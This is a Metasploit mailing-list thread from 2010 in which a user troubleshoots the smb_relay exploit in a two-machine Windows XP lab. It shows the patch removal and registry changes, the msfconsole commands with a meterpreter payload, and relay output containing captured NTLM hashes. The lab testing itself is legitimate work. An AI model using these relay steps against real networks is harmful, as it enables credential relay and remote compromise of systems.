Re: smb_relay returns "[-] Failed to authenticate"

[Christian Schäfer <syrious3000 () hotmail de>]

Hi there,

just set up two clean xp sp3 machines and got the following:

[*] Received 192.168.69.4:1116 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.4:1116 \
[*]
 Received 192.168.69.4:1118 SYRPLAY\test 
LMHASH:c502f5a4332271c33115639a412aaaacd121fd3f95a5a20d 
NTHASH:ccf6089244fabbbefcdaecd051d5ebd081782e123f7f73aa OS:Windows 2002 
Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.4 as SYRPLAY\test...
[*] AUTHENTICATED as SYRPLAY\test...
[*] Ignoring request from 192.168.69.4, attack already in progress.
[*] Sending Access Denied to 192.168.69.4:1118 SYRPLAY\test

looks nice...but when I type "sessions -l" there are no sessions ??..do you have clue for that?

From: syrious3000 () hotmail de
To: framework () spool metasploit com
Date: Wed, 29 Dec 2010 20:18:03 +0100
Subject: [framework] smb_relay returns "[-] Failed to authenticate"








Hello,


I'm just trying to get the smb_relay exploit working on an isolated test-asset containing of 2 win xp sp3 machines with 
Metasploit Framework 3.5.1. for demonstration purpose.

attacker: 192.168.69.7 
victim: 192.168.69.3


To get the exploit working I uninstalled the Win Security Update KB957097 (from both machines) which prevents the 
exploit.

After that I set LocalSecuritySettings / LocalPolicies / SecurityOptions / NetworkAccess: Sharing and Security model 
for local accounts to:  "Classic" on the vicitim.

Then I executed:  gpupdate /force in windows shell


On the attacking machine I set following network config:

> tcp/ip / advanced/wins:  disabled (to get port 139 free)

> client for ms networks:   enabled

> file & printer sharing...:  enabled

I made a change in the registry to get port 445 free) by setting:
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NetBT\Parameters] 
"SMBDeviceEnabled"=dword:00000000


I executed the exploit with the following commands and got a "Failed to authenticate" ...please help :(
(SYRDSL = computer name , test = username and password)

msf > use exploit/windows/smb/smb_relay
msf exploit(smb_relay) > set PAYLOAD windows/meterpreter/bind_tcp
PAYLOAD => windows/meterpreter/bind_tcp
msf exploit(smb_relay) > set SRVHOST 192.168.69.7
SRVHOST => 192.168.69.7
msf exploit(smb_relay) > exploit
[*] Exploit running as background job.
[*] Started bind handler
[*] Server started.
[*] Received 192.168.69.3:1079 \ LMHASH:00 NTHASH: OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Sending Access Denied to 192.168.69.3:1079 \
[*] Received 192.168.69.3:1079 SYRDSL\test LMHASH:3e5a5ee7d3fd22d72fc039c755c14c9c33eb1778f2f939cc 
NTHASH:1934e7b2bfe1bd8979b505fdcfbc03cc44bd94334991444b OS:Windows 2002 Service Pack 3 2600 LM:Windows 2002 5.1
[*] Authenticating to 192.168.69.3 as SYRDShttps://snt126.mail.live.com/default.aspx?rru=inbox&wa=wsignin1.0L\test...
[*] Trying to AUTHENTICATE: username= test , domain= SYRDSL
[-] Failed to authenticate as SYRDSL\test...


On the victim machine I tried:

typing in the explorer address line:  \\192.168.69.7\fakeShare\fakeFile.jpg

or in windows shell: net use \\192.168.69.7\ipc$ to trigger the exploit 



I would apreciate any hint...because I urgently need to get it working...please help :/
If i missed some important information  please tell and I will provide it.

Cheers
Christian
                                          

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework

_______________________________________________
https://mail.metasploit.com/mailman/listinfo/framework